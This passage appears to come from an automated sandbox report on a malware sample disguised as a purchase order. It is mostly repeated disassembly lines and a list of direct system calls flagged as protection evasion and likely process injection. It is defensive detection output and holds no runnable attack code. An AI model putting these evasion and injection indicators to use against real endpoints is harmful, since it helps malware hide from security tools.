                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]1_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov ecx, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]1_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370625D mov eax, dword ptr fs:[00000030h]1_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]1_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]1_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]1_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037062D6 mov eax, dword ptr fs:[00000030h]1_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA24 mov eax, dword ptr fs:[00000030h]1_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EA2E mov eax, dword ptr fs:[00000030h]1_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCA11 mov eax, dword ptr fs:[00000030h]1_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630AD0 mov eax, dword ptr fs:[00000030h]1_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686AA4 mov eax, dword ptr fs:[00000030h]1_2_03686AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704A80 mov eax, dword ptr fs:[00000030h]1_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668A90 mov edx, dword ptr fs:[00000030h]1_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov edx, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC97C mov eax, dword ptr fs:[00000030h]1_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0946 mov eax, dword ptr fs:[00000030h]1_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704940 mov eax, dword ptr fs:[00000030h]1_2_03704940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B892A mov eax, dword ptr fs:[00000030h]1_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C892B mov eax, dword ptr fs:[00000030h]1_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC912 mov eax, dword ptr fs:[00000030h]1_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE9E0 mov eax, dword ptr fs:[00000030h]1_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C69C0 mov eax, dword ptr fs:[00000030h]1_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036649D0 mov eax, dword ptr fs:[00000030h]1_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA9D3 mov eax, dword ptr fs:[00000030h]1_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov esi, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03642840 mov ecx, dword ptr fs:[00000030h]1_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660854 mov eax, dword ptr fs:[00000030h]1_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov ecx, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00C680A9
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C3A155
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C3A124 SetUnhandledExceptionFilter,0_2_00C3A124

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
